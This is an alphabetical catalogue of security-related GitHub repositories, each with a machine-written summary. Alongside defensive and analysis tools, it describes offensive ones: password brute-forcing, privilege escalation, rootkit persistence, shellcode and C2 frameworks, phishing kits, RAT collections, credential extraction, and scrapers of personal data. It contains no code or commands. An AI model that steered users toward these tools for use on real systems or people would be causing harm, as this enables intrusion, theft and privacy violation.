Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TermuxCyberArmy is a cybersecurity toolkit designed for Termux, primarily facilitating various hacking and scripting tasks. Notable features include compatibility with multiple Linux distributions such as Kali Linux and Parrot OS, as well as ease of installation using basic command-line operations. The tool is particularly suited for security practitioners seeking to enhance their skills in penetration testing and ethical hacking.

README

Update 19/06/2024

Login form has been removed

terracognita

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Terracognita is a tool that automates the import of existing cloud infrastructure into Terraform configurations (HCL) or Terraform state, particularly supporting AWS, GCP, Azure, and VMware. It streamlines the adoption of Infrastructure as Code (IaC) best practices by generating Terraform code from current cloud setups, enabling easier lifecycle management and integration with Cycloid’s DevOps pipelines. Notable features include support for multiple major cloud providers and an open-source nature that encourages community contributions.

terraform-aws-secure-baseline

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The terraform-aws-secure-baseline module automates the establishment of a secure configuration baseline for AWS accounts, adhering to recognized security benchmarks such as CIS AWS Foundations and AWS Foundational Security Best Practices. Key features include enhanced Identity and Access Management through IAM policies and roles, comprehensive logging and monitoring via AWS CloudTrail and CloudWatch, and secure networking configurations that limit exposure and enforce best practices. This module is integral for organizations seeking to enhance their security posture in AWS by simplifying compliance with security standards.

Terrapin-Scanner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Terrapin Vulnerability Scanner is a Go-based utility designed to assess the vulnerability of SSH clients and servers against the Terrapin Attack. It utilizes a single connection to retrieve supported algorithms without initiating a full SSH key exchange, allowing it to identify potential vulnerabilities and support for known countermeasures like strict key exchange. Notable features include JSON output for results, support for various operating systems via pre-compiled binaries and Docker, and ease of building from source.

Textractor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Textractor is an open-source text hooking tool designed for x86/x64 video games on Windows and Wine, enabling users to extract in-game text for translation or accessibility purposes. It features automatic hooking for multiple game engines, extensive customization options, and support for AGTH hook codes, making it adaptable for varied gaming environments. The tool also allows for the development of custom extensions, enhancing its functionality and user experience.

README

Textractor

THC-Archive

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: THC-Archive is a repository that consolidates all releases from The Hacker’s Choice, a prominent security research group. This collection serves as a backup for their work, ensuring that projects are preserved despite the lack of a full web server. Notable active projects include THC-Hydra, THC-IPv6, and utilities aimed at various hacking and security tasks.

README

THC-Archive

All releases of the security research group (a.k.a. hackers) The Hacker’s Choice

thc-hydra

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: THC-Hydra is a versatile password-cracking tool designed for testing the security of various network services by attempting to gain unauthorized access through brute-force attacks. It supports multiple protocols, including FTP, HTTP, SSH, and many others, enabling security researchers and consultants to evaluate password strength and recognize vulnerabilities across a wide range of applications. Notable features include its ability to conduct parallelized connection attempts and an extensible module engine for easy addition of new protocols.

The_Holy_Book_of_X86

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Holy Book of X86 is a comprehensive guide focused on x86 architecture, assembly language, and operating system internals, aimed at enhancing the reader’s understanding of computer systems. It features a crash course in x86 assembly and covers essential topics such as memory management, paging, segmentation, and interrupts, making it suitable for learners and practitioners in systems programming and reverse engineering. Notably, the repository includes practical examples and applications in pure assembly, aiding in the development of foundational skills in low-level programming.

theHarvester

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: theHarvester is a reconnaissance tool designed for red team assessments and penetration tests, facilitating the gathering of open-source intelligence (OSINT). It collects various types of data such as names, emails, IP addresses, subdomains, and URLs from multiple public sources, enhancing a security professional’s understanding of a domain’s external threat landscape. Notable features include support for numerous passive modules that query different search engines and databases, enabling comprehensive domain analysis and threat enumeration.

theZoo

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: theZoo is a live malware repository designed to facilitate malware analysis by providing a comprehensive collection of malware samples and source code for educational and research purposes. It enables users to safely analyze malware behavior in isolated environments, with guidance on precautions for running potentially dangerous samples. Notable features include a user-friendly setup through a Python-based command-line interface and organized access to various malware types for in-depth research.

thorium

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Thorium is a scalable file analysis and data generation platform designed to orchestrate various docker, VM, or shell tools at scale. Its primary use case is to facilitate the analysis of arbitrary files and repositories, while featuring easy tool import capabilities, static and dynamic analysis sandboxes, a RESTful API, and multi-tenant support for permission management. Additionally, Thorium supports comprehensive search functionalities and includes a wide array of pre-integrated analysis tools, making it suitable for both individual developers and collaborative analytics environments.

thug

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Thug is a low-interaction honeyclient developed in Python that emulates the behavior of a web browser to detect and analyze client-side attacks by allowing malicious content to exploit its simulated environment. Its primary use case is research and detection of vulnerabilities in client applications, akin to a honeypot but focused on the client side. Notable features include its ability to mimic user interactions and support for detailed analysis of malicious payloads in a controlled setting.

TIDoS-Framework

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TIDoS is an advanced offensive web application penetration testing framework designed to facilitate comprehensive security assessments by automating tasks across multiple phases, including reconnaissance, scanning, and vulnerability analysis. With over 100 modules and features such as multiprocessing for performance enhancement, a Metasploit-like console interface, and a graphical user interface, TIDoS streamlines the penetration testing process, enabling users to conduct efficient and thorough web application security assessments with minimal configuration. Additional capabilities like Tor integration further enhance anonymity during testing efforts.

Tigress_protection

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Tigress is a virtualizer and obfuscator for the C programming language that provides extensive defenses against both static and dynamic reverse engineering through advanced code transformation techniques. Its notable features include the generation of diverse virtual instruction sets, embedding of bogus functions, the application of anti de-virtualization measures, and support for continuous runtime code modification. The tool is particularly designed for security researchers looking to protect code integrity and for those involved in code analysis challenges requiring the deobfuscation of protected binaries.

TiltedEvolution

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Tilted Online is a framework designed to facilitate multiplayer gameplay in Bethesda’s Skyrim Special Edition. It provides essential components such as game client sources, an immersive launcher, and server implementations, all structured to enhance the multiplayer experience. Notable features include a modular architecture for client-server interactions and community-driven development, allowing contributors with C++ experience to actively participate.

README

Tilted Online

tinfoleak

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: tinfoleak is an open-source tool designed for Twitter intelligence analysis, enabling automated extraction and analysis of data based on user identifiers, geographic coordinates, or keywords. It provides comprehensive insights into user activities, account relations, geolocation data, and engagement metrics, making it a valuable resource for intelligence analysts. Notable features include ability to analyze text and media, track user interactions, and monitor digital identities across social networks.

README

tinfoleak

The most complete open-source tool for Twitter intelligence analysis

tiny_tracer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Tiny Tracer is a binary instrumentation tool designed for tracing API calls, defined local functions, selected instructions, and inline system calls, while also evading various anti-debug and anti-VM techniques. It generates detailed reports in a .tag format, which can be utilized by other analysis tools, facilitating deeper insights into a program’s execution flow. The tool is primarily aimed at security researchers and analysts who need to examine malicious binaries or analyze software behavior in a controlled environment.

tlosint-live

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The tlosint-live repository provides a custom build configuration for a Kali Linux-based OSINT distribution tailored for Trace Labs. Its primary use case is to streamline the creation of a live OSINT environment, featuring a set of pre-configured tools and applications for data analysis, domain reconnaissance, and social media investigations. Notable features include an easily modifiable package list, integration of various OSINT tools, and the capability to generate a bootable ISO or OVA file for virtual environments.

tookie-osint

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Tookie-OSINT is an open-source tool designed for username discovery across multiple online platforms, offering a straightforward user interface for ease of use. It aims to facilitate operational security and intelligence gathering for new programmers and penetration testers, achieving an approximately 80% success rate in finding user accounts. Notable features include full reimplementation for enhanced performance and multilingual support.

README

toolkit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Indetectables Toolkit is a comprehensive suite designed for malware analysts and cybersecurity professionals, offering a wide range of 101 tools for various tasks. Key features include automated updates via a Universal Updater, easy extensibility for adding new tools, and integration with Windows context menus for enhanced usability. The toolkit aims to streamline the workflow for both novice and experienced users while providing reliable and curated resources for cybersecurity operations.

TOP

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TOP is a vulnerability cataloging tool designed for bug bounty hunters and penetration testers, focusing on proof-of-concept (PoC) exploits for various Common Vulnerabilities and Exposures (CVEs) from recent years. It compiles a list of notable CVEs along with their respective exploits and corresponding GitHub repositories, thereby facilitating ease of access and research for security professionals. Key features include organized yearly summaries of significant vulnerabilities, making it an essential resource for monitoring and exploiting security weaknesses.

top25-parameter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “top25-parameter” repository provides a curated list of the 25 most commonly vulnerable parameters associated with various web security vulnerabilities, including Cross-Site Scripting (XSS), SQL Injection (SQLi), and Server-Side Request Forgery (SSRF). It is intended for use in both manual reconnaissance and automation tools, supported by data sourced from OSINT and articles in the cybersecurity community. Notable features include organized parameters for different vulnerabilities, aiding security researchers and practitioners in identifying and mitigating risks effectively.

TorBot

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TorBot is an open-source intelligence tool designed for crawling and gathering data from .onion websites on the dark web. Its primary use case involves extracting page titles, saving links in a database, and visualizing link relationships, facilitating user insights into dark web resources. Notable features include the ability to check link status, customize crawling depth, and output results in various formats such as JSON and HTML.

README

████████╗ ██████╗ ██████╗ ██████╗ ██████╗ ████████╗ ╚══██╔══╝██╔═══██╗██╔══██╗ ██╔══██╗██╔═████╗╚══██╔══╝ ██║ ██║ ██║██████╔╝ ██████╔╝██║██╔██║ ██║ ██║ ██║ ██║██╔══██╗ ██╔══██╗████╔╝██║ ██║ ██║ ╚██████╔╝██║ ██║ ██████╔╝╚██████╔╝ ██║ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ Open Source Intelligence Tool for the Dark Web

toutatis

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Toutatis is a Python-based tool designed for extracting detailed information from Instagram accounts, such as emails, phone numbers, and user statistics. Its primary use case is to facilitate data retrieval for user analysis or account verification, utilizing either a username or an Instagram ID. Notable features include the ability to access both public and obfuscated contact details, alongside comprehensive profile metrics.

README

Toutatis

👋 Hi there! For any professional inquiries or collaborations, please reach out to me at: megadose@protonmail.com

TRADFRI-Hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TRADFRI-Hacking is a project designed to facilitate the reverse engineering and customization of IKEA’s TRÅDFRI home automation products, which utilize Zigbee technology. It offers detailed resources for product teardowns, firmware manipulation, and the creation of custom hardware solutions using the TRÅDFRI modules, including tools for firmware dumping and development. Notable features include an extensive documentation of various TRÅDFRI products, customizable firmware options, and insights into hardware modifications, empowering developers to repurpose and enhance these smart home devices.

traitor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Traitor is a privilege escalation tool designed to automatically exploit local vulnerabilities and misconfigurations in Unix-like systems to achieve a root shell. It incorporates various methods from GTFOBins and specific CVEs, allowing users to discover potential exploits with options to directly attempt them if necessary. Notable features include the ability to analyze sudo permissions, the option to exploit specific vulnerabilities, and support for various privilege escalation vectors.

README

Traitor

Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy!

trape

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Trape is an OSINT analysis tool designed for real-time tracking and execution of social engineering attacks, primarily aimed at assisting government organizations, companies, and researchers in identifying cybercriminals. Key features include precise locator optimization, a REST API for remote website monitoring, and capabilities for executing phishing attacks, managing JavaScript injections, and analyzing target network information. The tool emphasizes stealth and user control, allowing for sophisticated manipulation of browser behavior to extract sensitive information covertly.

tripwire-open-source

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Open Source Tripwire® is a file integrity monitoring tool designed to detect and alert users about unauthorized changes to files and directories by comparing the current filesystem state against a predefined baseline. It features a highly configurable policy file system for specifying which attributes to monitor, the capability to sign configuration and report files for added security, and the ability to generate and manage cryptographic keys for multiple machines. Users can utilize it to establish secure baselines and automate periodic checks, enhancing overall system integrity and security.

Triton

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Triton is a dynamic binary analysis library designed for building program analysis tools, enabling automated reverse engineering and software verification. It supports dynamic symbolic execution and taint analysis across multiple architectures including x86, ARM, and RISC-V, and features a powerful API in both C++ and Python, as well as capabilities for expression synthesis, SMT solver integration, and LLVM lifting.

README

Triton is a dynamic binary analysis library. It provides internal components that allow you to build your program analysis tools, automate reverse engineering, perform software verification or just emulate code.

trivy-operator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Trivy Operator is a Kubernetes-native security toolkit that utilizes Trivy to perform continuous security scans of Kubernetes clusters. It automatically generates and updates comprehensive security reports, including vulnerability assessments, configuration audits, and compliance checks, which are accessible through the Kubernetes API. Notable features include automated scans for workloads, RBAC assessments, secret exposure detection, and generation of Software Bill of Materials (SBOM) for workloads, aiding in the identification and mitigation of potential security risks in real-time.

TRX

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TRX is an open-source reimplementation of the classic Tomb Raider games (I, II, and III), designed to enhance gameplay through decompilation and integration of open-source components. The engine supports distinct mechanics for all three titles and features enhancements such as customizable draw distances, a developer console, updated UI elements, and the capability to run custom levels. Notably, TRX is cross-platform, supporting Windows, Linux, and macOS, with extensive controller compatibility and customizable control options.

TryHackMe-Roadmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The TryHackMe Road Map repository provides a comprehensive list of over 350 free TryHackMe rooms categorized by various cybersecurity topics to facilitate learning and practice in ethical hacking. Its primary use case is to help individuals, from beginners to advanced users, streamline their training by accessing a structured pathway through challenges in areas such as Linux fundamentals, web security, and more. Notable features include the organization of topics for a sequential learning approach and the inclusion of various practical scenarios to enhance hands-on experience in cybersecurity.

twitter-advanced-search

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Twitter Advanced Search tool enhances tweet discovery by leveraging various search operators that allow users to refine their queries based on content, hashtags, emojis, and more. Its primary use case is enabling users to perform intricate searches on Twitter’s web, mobile, and TweetDeck platforms, although it is not compatible with certain Twitter API versions. Notable features include support for boolean operators, wildcard searches, and the ability to exclude terms or phrases, significantly expanding the capabilities of standard Twitter search functionalities.

uDork

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: uDork is a Bash script designed for Google hacking, leveraging advanced search techniques to uncover sensitive information and detect web application versions without conducting direct attacks. The tool utilizes predefined dorks sourced from the Google Hacking Database, allowing users to find sensitive files, IoT devices, and security vulnerabilities efficiently. Notable features include speed improvements between requests and Docker support for easy deployment.

README

uDork - Google Hacking Tool

Author: M3n0sD0n4ld

Twitter: @David_Uton

News

11/06/2022

I have some bad news to give, last week Facebook withdrew the service by which the tool made the requests, unfortunately the tool no longer works.

Ukraine-Cyber-Operations

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Ukraine Cyber Operations repository provides curated threat intelligence resources specifically tailored for organizations in Ukraine, focusing on the ongoing cyber operations related to the Russia-Ukraine conflict. Notable features include a comprehensive timeline of monthly threat reports from 2022 and 2023, contextualized indicators of compromise (IOCs) contributed by the Equinix Threat Analysis Center, and vetted open-source intelligence (OSINT) sources, enhancing the situational awareness and response capabilities of users.

Ultimate-RAT-Collection

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Ultimate RAT Collection functions as a repository of Remote Access Trojan (RAT) samples and builders, primarily used for cybersecurity research, analysis, and reverse engineering. It emphasizes caution by advising users to conduct their analysis within secure environments like virtual machines or sandboxes to prevent contamination of critical systems. Notable features include a collection of genuine malware samples and a community-driven approach to include new samples through pull requests.

unipacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Un{i}packer is a platform-independent tool designed for the automatic unpacking of Windows Portable Executable (PE) files that have been packed using various runtime packers, thereby facilitating malware analysis. Utilizing the Unicorn Engine for emulation, it effectively handles multiple well-known packers, including ASPack and UPX, and allows for manual input of addresses for less common packers. This tool is particularly beneficial for analysts seeking to bypass challenges posed by malware obfuscation and streamline the unpacking process without requiring a Windows environment.

unlicense

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Unlicense is a Python 3 tool designed to dynamically unpack executables protected by Themida and WinLicense versions 2.x and 3.x, accommodating both 32-bit and 64-bit portable executables (PEs) and .NET assemblies. Its notable features include automatic recovery of the original entry point (OEP) and obfuscated import tables, although it requires a valid license file for certain WinLicense-protected executables and may produce non-runnable dumps. Users can interact with the tool via a command-line interface or a drag-and-drop executable option for ease of use.

urlfinder

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: URLFinder is a high-speed, passive URL discovery tool optimized for efficient web asset discovery without active scanning, making it particularly useful for penetration testers and security researchers. It features curated passive sources for comprehensive URL gathering, supports multiple output formats, and provides integration capabilities through STDIN/OUT support.

README

URLFinder

A high-speed tool for passively gathering URLs, optimized for efficient web asset discovery without active scanning.

Features • Installation • Usage • Examples • Join Discord

urlhunter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: urlhunter is a reconnaissance tool designed for searching URLs exposed via URL shortener services like bit.ly and goo.gl. It utilizes collections published by the URLTeam, enabling users to perform keyword and regex searches on historical data with customizable date ranges and output options. Notable features include the ability to specify single or multiple keywords, regex searches, and support for bulk archive downloading, making it ideal for cyber intelligence and bug bounty applications.

Uscrapper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Uscrapper Vanta is an open-source intelligence tool designed for advanced data extraction from both the surface web and the dark web, specifically targeting personal information such as email addresses, social media links, and geolocations. Notable features include keyword-based scraping for tailored data extraction, support for .onion domains, and comprehensive reporting capabilities, which transform raw data into actionable insights. The tool employs multithreading and anti-web scraping defenses to enhance its effectiveness in information gathering.

user-scanner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: User Scanner is an advanced email and username OSINT tool designed to verify the registration status of emails and the availability of usernames across multiple platforms, including GitHub, X (formerly Twitter), Reddit, and Instagram. It features dual-mode usage for email and username scanning, supports bulk scanning, utilizes wildcard-based username permutations, and provides clear output formats such as JSON and CSV, along with proxy support for enhanced anonymity. The tool’s modular architecture allows for easy integration of new platforms, making it a versatile choice for security professionals and branding efforts.

UserFinder

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: UserFinder is a shell-based tool designed for identifying users across various social media platforms and gathering additional information. It enables users to perform queries and compile data efficiently, featuring an easy installation process and a straightforward command-line interface. Notable features include a user-friendly script execution with minimal setup requirements and a focus on social profiling capabilities.

README

• License • Issues • Developer • Wikipedia •
Find user in social and more informations!

username-anarchy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Username Anarchy is a command-line tool designed for generating potential usernames during penetration testing, crucial for user account/password brute force attacks and username enumeration. It features a flexible plugin architecture for various username formats, utilizes common first and last names databases from external sources, and allows for name substitutions to maximize coverage when only partial user information is known. This tool supports input from multiple formats and automates name generation based on country datasets or popular social media aliases.

v3-periphery

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Uniswap V3 Periphery is a collection of smart contracts designed to facilitate interactions with the Uniswap V3 Protocol, providing essential functionalities such as token swaps and liquidity operations. Its primary use case involves integrating these periphery functions into decentralized applications, enabling developers to leverage the protocol’s capabilities. Notable features include the ability to import Solidity interfaces for seamless contract interactions and comprehensive local deployment options for testing against mainnet bytecode.

V3n0M-Scanner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: V3n0M-Scanner is an offensive security framework designed for vulnerability scanning and penetration testing, offering a Python-based toolkit that operates across both Linux and Windows platforms. Notable features include advanced scanning capabilities for SQL injection, local file inclusion to remote code execution, and a Cloudflare resolver, along with extensive target lists and efficient scanning of potentially millions of IPs for known vulnerabilities. The tool is open-source and aims to provide transparency and ease of use for security professionals.

VAC

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VAC is a user-mode anti-cheat system developed by Valve, designed to operate non-invasively on Windows systems. The tool utilizes a set of modules to gather critical system information, enumerate processes, and monitor game performance, primarily focusing on maintaining the integrity of online gaming environments. Notable features include the use of various encryption and hashing methods, such as MD5 and CRC32, to secure operations and information within its modules.

Validity90

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Validity90 is a tool focused on reverse engineering the communication protocol of various Validity fingerprint readers, such as models 138a:0090 and 138a:0094. It aims to create an open-source driver for integration with the libfprint library, featuring a Wireshark dissector for analyzing encrypted communication and a standalone prototype for testing device functionalities. Notably, the project is actively developing specifications and protocols for multiple devices, with partial implementation already achieving scan and internal database check capabilities.

VAmPI

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VAmPI is a vulnerable API built on Flask that includes the OWASP Top 10 vulnerabilities for APIs, designed to assess the efficacy of security tools in detecting API-related security issues. It features a global toggle to enable or disable vulnerabilities during testing, along with token-based authentication and a Swagger UI for direct interaction. The tool serves both educational and practical purposes, allowing users to practice security testing and improve their understanding of API vulnerabilities.

Vegile

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Vegile is a post-exploitation tool designed for maintaining stealthy backdoor/rootkit access on Linux systems. Its primary use case involves establishing persistent access to compromised hosts while enabling features such as process hiding and session unlimited capabilities in Metasploit. Notable functionalities include the ability to automatically restart hidden processes, ensuring persistent access even after termination, and support for various backdoor implementations, including those created with msfvenom.

README

Vegile - Ghost In The Shell

venom

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VENOM is a metasploit shellcode generator and compiler that enables users to create and inject shellcode payloads in various formats such as C#, Python, Ruby, and executable formats like ELF and APK. Its primary use case lies in Red Team operations, where it assists in payload delivery through a web server and leverages automation to handle dependencies and remote connections seamlessly. Notable features include support for multiple scripting languages, integration with compilers for building executables, and functionalities similar to other popular evasion tools.

Venom

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Venom is a multi-hop proxy tool designed for penetration testers, built using Go, which allows the connection of multiple nodes to facilitate multi-layer traffic routing. Key features include a visual network topology, multi-level SOCKS5 proxying, interactive shell access, and secure communication between nodes, making it ideal for managing complex internal networks during security assessments. The tool supports various platforms and architectures, enhancing its versatility for engagements in diverse environments.

VHostScan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VHostScan is a virtual host scanner designed to enhance the discovery of virtual hosts and identify catch-all scenarios, aliases, and dynamic default pages. This tool is particularly useful for penetration testers and security professionals, as it features a modernized codebase, improved wordlists for various environments, robust error handling, and performance optimizations. Notable capabilities include support for both HTTP and HTTPS, customizable wordlist inputs, and the ability to identify new targets through reverse lookups.

Villain

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Villain is a high-level C2 framework designed for managing multiple reverse TCP and HoaxShell-based shells, allowing users to enhance shell functionality and share features across different instances. Notable features include customizable payload generation, a dynamic pseudo-shell prompt for session management, file upload capabilities, fileless script execution, and a built-in Session Defender to prevent user errors during command input. The tool is primarily aimed at ethical hacking and penetration testing, ensuring users operate within legal boundaries.

Viper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VIPER is an advanced red team platform designed for adversary simulation and cybersecurity assessments, providing users with essential tools and functionalities for efficient red teaming operations. Notable features include a user-friendly interface, multi-platform support across Windows, Linux, and macOS, integration of over 100 post-exploitation modules aligned with the MITRE ATT&CK framework, and a built-in LLM agent for enhanced automation and intelligent decision-making. The platform also allows for custom module development, ensuring flexibility to meet diverse operational needs.

ViperMonkey

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ViperMonkey is a Python-based VBA emulation engine specifically designed for the analysis and deobfuscation of malicious VBA macros found in Microsoft Office files. Its primary use case is aiding cybersecurity professionals in identifying and understanding obfuscated malware by executing VBA scripts in a controlled environment. Notable features include its integration with Docker for ease of installation and enhanced performance when utilizing PyPy, although it also operates with traditional Python interpreters.

vivisect

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Vivisect is a versatile framework that integrates disassembly, static analysis, symbolic execution, and debugging capabilities, designed for use in cybersecurity tasks. Its primary use case is to facilitate in-depth analysis of binary executables, assisting researchers and security professionals in vulnerability discovery and exploitation analysis. Notable features include Python 3 compatibility, a graphical user interface, and seamless integration with documentation for enhanced usability.

README

Vivisect / Vdb / Vtrace

A combined disassembler/static analysis/symbolic execution/debugger framework.

VMkatz

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VMkatz is a cybersecurity tool designed to extract Windows credentials and secrets directly from virtual machine memory snapshots and disk images without the need for full exfiltration. It supports various input formats, including VMware snapshots and VirtualBox saved states, allowing efficient retrieval of sensitive data such as NTLM hashes, DPAPI master keys, and Kerberos tickets directly from the hypervisor or NAS. Notably, VMkatz operates as a single static binary, requiring minimal setup and enabling rapid credential access in red team engagements.

vmlinux-to-elf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: vmlinux-to-elf is a tool designed to convert vmlinux, vmlinuz, bzImage, or zImage kernel images into fully analyzable ELF files, recovering function and variable symbols from compressed kernel symbol tables. Its primary use case is embedded systems reverse engineering, enabling users to analyze the resulting ELF files with tools such as IDA Pro and Ghidra. Notable features include automatic detection and unpacking of the main compression formats used in Linux kernels, as well as a graphical user interface for enhanced usability.

vps-audit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The VPS Security Audit Script is a comprehensive Bash tool designed for auditing the security and performance of Debian/Ubuntu-based virtual private servers. It performs extensive security checks, including SSH configuration, firewall status, and system update status, while also monitoring resource usage such as disk space and CPU. The script not only provides real-time color-coded feedback during execution but also generates a detailed report with improvement recommendations based on the audit findings.

vulhunt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VulHunt is a vulnerability hunting framework aimed at assisting security researchers in identifying vulnerabilities within software binaries and UEFI firmware. Built on Binarly’s BIAS, it supports large-scale vulnerability management and integrates community-developed rulepacks while offering scanning capabilities for various binary formats, including BA2 and Binary Ninja databases. Additionally, it features an MCP server for integration with AI assistants, facilitating real-time vulnerability analysis and reporting.

README

VulHunt Community Edition

VulHunt is a vulnerability hunting framework developed by Binarly’s Research team. It is designed to help security researchers and practitioners identify vulnerabilities in software binaries and UEFI firmware. VulHunt is built on top of Binarly’s Binary Analysis and Inspection System (BIAS), which provides a powerful and flexible environment for analysing and understanding binaries. VulHunt integrates with the capabilities of the Binarly Transparency Platform (BTP) to enable large-scale vulnerability management, hunting, and triage capabilities.

vulnx

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: VulnX is an intelligent bot designed for automatic shell injection that identifies vulnerabilities across various content management systems (CMS). Key features include multi-threaded vulnerability scanning, target information gathering, subdomain enumeration, and the ability to search for exploits using dorks, which streamline the injection process as opposed to manual methods. The tool supports multiple CMS platforms, enhancing its usability for security assessments and penetration testing.

README

VulnX

Vulnx 🕷️ is An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms

vulscan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Vulscan is a powerful Nmap module that transforms the commonly used network scanning tool into an effective vulnerability scanner by leveraging version detection to identify potential flaws in services. It utilizes various pre-defined vulnerability databases such as VulDB and CVE, with the capability of supporting custom databases for enhanced flexibility. Notable features include automatic updates for vulnerability databases and configurable settings to optimize match priority and version detection.

w13scan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: W13Scan is an open-source web vulnerability scanner written in Python3, capable of both active and passive scanning modes across Windows, Linux, and Mac platforms. It features a comprehensive suite of detection plugins, including XSS, SQL injection, and file leakage checks, along with customizable modules for specialized environments, ensuring high accuracy and adaptability for security professionals.

README

W13Scan

W13scan 是基于Python3的一款开源的Web漏洞发现工具,它支持主动扫描模式和被动扫描模式，能运行在Windows、Linux、Mac上。

html模板源码:w13scan-report

声明

使用W13Scan前请遵守当地法律,W13Scan仅提供给教育行为使用。

WADComs.github.io

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WADComs is an interactive cheat sheet designed for offensive security professionals, offering a curated list of tools and their commands specifically for targeting Windows and Active Directory environments. Its primary use case is to aid security experts in executing effective penetration testing by providing quick access to essential commands. Notable features include its comprehensive tool listings and command syntaxes, all consolidated in a web-based format for ease of use.

Watcher

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Watcher is an AI-powered automated cybersecurity threat detection platform built on Django and React JS, enabling organizations to proactively identify and monitor emerging cybersecurity threats. Its primary use case includes automated intelligence analysis, real-time alerts for trending cybersecurity topics, and comprehensive domain management to combat potential cyber threats. Notable features encompass information leak monitoring, malicious domain surveillance, and integration with external threat intelligence sources for enhanced situational awareness.

wazuh

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Wazuh is an open-source security platform designed for threat prevention, detection, and response across various environments, including on-premises, virtualized, containerized, and cloud settings. It features an endpoint security agent that collects data for analysis by a centralized management server, fully integrated with the Elastic Stack for enhanced search and visualization of security alerts. Key capabilities include intrusion detection, log data analysis, file integrity monitoring, vulnerability detection, configuration assessment, and automated incident response, making it a comprehensive tool for maintaining security compliance and mitigating threats.

Web_Hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Web Hacking is a comprehensive repository of notes focused on bug bounty hunting and penetration testing, collating various techniques for vulnerability discovery and exploitation. The tool features extensive reconnaissance and OSINT methods, a detailed list of common vulnerabilities, and bypass techniques, making it a valuable resource for security professionals seeking to enhance their skills and methodologies in web application security. Additionally, it encourages community contributions, fostering continuous improvement and updates of its content.

Web-App-Pentest-Checklist

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Web App Pentest Checklist” is a comprehensive OWASP-based tool designed for web application security assessments, featuring over 500 test cases across various categories such as information gathering, configuration management, and vulnerability testing. Its extensive coverage includes methods for reconnaissance, fingerprinting technologies, and testing for security misconfigurations and common vulnerabilities, making it an essential resource for penetration testers. Notable features include detailed checklists for enumerating applications, verifying configurations, and ensuring compliance with security best practices.

Web-Cache-Vulnerability-Scanner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Web Cache Vulnerability Scanner (WCVS) is a command-line interface tool designed to identify and exploit web cache poisoning and deception vulnerabilities across various web applications. It supports multiple techniques for both attack types, features a crawler for discovering additional URLs, and can be integrated into CI/CD processes to streamline security practices. Notable functionalities include customizable request handling, JSON report generation, and the ability to route traffic through a proxy for enhanced testing versatility.

web-check

